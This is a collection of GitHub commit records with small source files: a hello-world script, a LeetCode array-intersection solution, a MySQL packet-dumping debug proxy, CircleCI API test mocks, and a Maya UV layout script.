9cc09c6143025d88eedfa4f8eedcd23e2fe7990e | Create sahilprakash.py | WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,vansjyo/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17,WebClub-NITK/Hacktoberfest-2k17 | Python/sahilprakash.py | Python/sahilprakash.py | print("Hello World!")
| mit | Python |
|
9cc13ca511987584ea4f52cf0c2e57e6b98a9e8b | Add lc0350_intersection_of_two_arrays_ii.py | bowen0701/algorithms_data_structures | lc0350_intersection_of_two_arrays_ii.py | lc0350_intersection_of_two_arrays_ii.py | """Leetcode 350. Intersection of Two Arrays II
Easy
URL: https://leetcode.com/problems/intersection-of-two-arrays-ii/
Given two arrays, write a function to compute their intersection.
Example 1:
Input: nums1 = [1,2,2,1], nums2 = [2,2]
Output: [2,2]
Example 2:
Input: nums1 = [4,9,5], nums2 = [9,4,9,8,4]
Output: [4,9]
Note:
- Each element in the result should appear as many times as it shows in both arrays.
- The result can be in any order.
Follow up:
- What if the given array is already sorted? How would you optimize your algorithm?
- What if nums1's size is small compared to nums2's size? Which algorithm is better?
- What if elements of nums2 are stored on disk, and the memory is limited such that
you cannot load all elements into the memory at once?
"""
import collections

class Solution(object):
    def intersect(self, nums1, nums2):
        """
        :type nums1: List[int]
        :type nums2: List[int]
        :rtype: List[int]
        """
        # Count nums1, then emit matches from nums2 while counts remain,
        # so duplicates appear the correct number of times.
        counts = collections.Counter(nums1)
        result = []
        for num in nums2:
            if counts[num] > 0:
                result.append(num)
                counts[num] -= 1
        return result

def main():
    print(Solution().intersect([1, 2, 2, 1], [2, 2]))        # [2, 2]
    print(Solution().intersect([4, 9, 5], [9, 4, 9, 8, 4]))  # [9, 4]
if __name__ == '__main__':
main()
| bsd-2-clause | Python |
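For the sorted-input follow-up raised in the docstring, a two-pointer sketch (an assumed variant, not part of the original file) that avoids the counter:

def intersect_sorted(a, b):
    # a and b must already be sorted; advance the pointer behind the smaller
    # value and emit matches, keeping duplicates the right number of times.
    i = j = 0
    out = []
    while i < len(a) and j < len(b):
        if a[i] < b[j]:
            i += 1
        elif a[i] > b[j]:
            j += 1
        else:
            out.append(a[i])
            i += 1
            j += 1
    return out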
|
eb3882051241843716ef9b7ceef8aeb6ee2a35c6 | add mysqlproxy.py | nakagami/CyMySQL | misc/mysqlproxy.py | misc/mysqlproxy.py | #!/usr/bin/env python3
##############################################################################
#The MIT License (MIT)
#
#Copyright (c) 2016 Hajime Nakagami
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
##############################################################################
import sys
import socket
import binascii
def recv_mysql_packet(sock):
head = sock.recv(4)
n = int.from_bytes(head[:3], byteorder='little')
    received = b''
    while n:
        bs = sock.recv(n)
        received += bs
        n -= len(bs)
    return head + received
def asc_dump(s):
r = ''
for c in s:
r += chr(c) if (c >= 32 and c < 128) else '.'
if r:
print('[' + r + ']')
def proxy_wire(server_name, server_port, listen_host, listen_port):
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((listen_host, listen_port))
sock.listen(1)
client_sock, addr = sock.accept()
server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_sock.connect((server_name, server_port))
while True:
client_data = recv_mysql_packet(client_sock)
server_sock.send(client_data)
print('>>', binascii.b2a_hex(client_data).decode('ascii'))
asc_dump(client_data)
server_data = recv_mysql_packet(server_sock)
client_sock.send(server_data)
print('<<', binascii.b2a_hex(server_data).decode('ascii'))
asc_dump(server_data)
if __name__ == '__main__':
if len(sys.argv) < 3:
print('Usage : ' + sys.argv[0] + ' server[:port] [listen_host:]listen_port')
sys.exit()
server = sys.argv[1].split(':')
server_name = server[0]
if len(server) == 1:
server_port = 3306
else:
server_port = int(server[1])
listen = sys.argv[2].split(':')
if len(listen) == 1:
listen_host = 'localhost'
listen_port = int(listen[0])
else:
listen_host = listen[0]
listen_port = int(listen[1])
proxy_wire(server_name, server_port, listen_host, listen_port)
| mit | Python |
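An example session with assumed values, matching the usage string above: forward a local port to the real server, then point a client at the proxy to see each packet hex-dumped:

# $ python3 mysqlproxy.py localhost:3306 3307
# $ mysql -h 127.0.0.1 -P 3307 -u someuser -p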
|
f1c389a0028c6f92300573bef587c084204e858f | Create circlecli.py | TheRealJoeLinux/circlecli,TheRealJoeLinux/circlecli | mocks/circlecli.py | mocks/circlecli.py | # -*- coding: utf-8 -*-
"""
Mocks for the CircleCLI API library tests.
"""
from httmock import response, urlmatch
NETLOC = r'(.*\.)?circleci\.com$'
HEADERS = {'content-type': 'application/json'}
GET = 'get'
class Resource:
""" A CircleCli resource.
:param path: The file path to the resource.
"""
def __init__(self, path):
self.path = path
def get(self):
""" Perform a GET request on the resource.
:rtype: str
"""
with open(self.path, 'r') as f:
content = f.read()
return content
@urlmatch(netloc=NETLOC, method=GET)
def resource_get(url, request):
file_path = url.netloc + url.path
try:
content = Resource(file_path).get()
except EnvironmentError:
# catch any environment errors (i.e. file does not exist) and return a
# 404.
return response(404, {}, HEADERS, None, 5, request)
return response(200, content, HEADERS, None, 5, request)
| mit | Python |
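A usage sketch for these mocks with httmock's context manager; the fixture path is an assumption, since Resource resolves netloc + path as a file path relative to the working directory:

import requests
from httmock import HTTMock
from mocks.circlecli import resource_get

with HTTMock(resource_get):
    # answered from the local file 'circleci.com/api/v1/me' if present,
    # otherwise the mock returns a 404
    r = requests.get('https://circleci.com/api/v1/me')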
|
30359b6e9ec105b2938cedd59127e5fa40964396 | Create setrun.py | mandli/surge-examples | rect-shelf/setrun.py | rect-shelf/setrun.py | mit | Python |
||
39d2a5eec167e659cd30f5522a9e4e9ca11a620a | Create layoutUVPlus.py | aaronfang/personal_scripts | af_scripts/uv/layoutUVPlus.py | af_scripts/uv/layoutUVPlus.py | import pymel.core as pm
import math
sels = pm.ls(sl=1)
gap = 0.003
for i, x in enumerate(sels):
x=x.getShape()
pm.select('{0}.map[:]'.format(x), r=1)
buv = pm.polyEvaluate(x,b2=1)
w = abs(buv[0][1] - buv[0][0])
if i==0:
pm.polyEditUV(u=-buv[0][0]+(gap*(i+1)),v=-buv[1][0]+gap)
else:
pm.polyEditUV(u=-buv[0][0]+(w*i+gap*(i+1)),v=-buv[1][0]+gap)
pm.select(sels,r=1)
| mit | Python |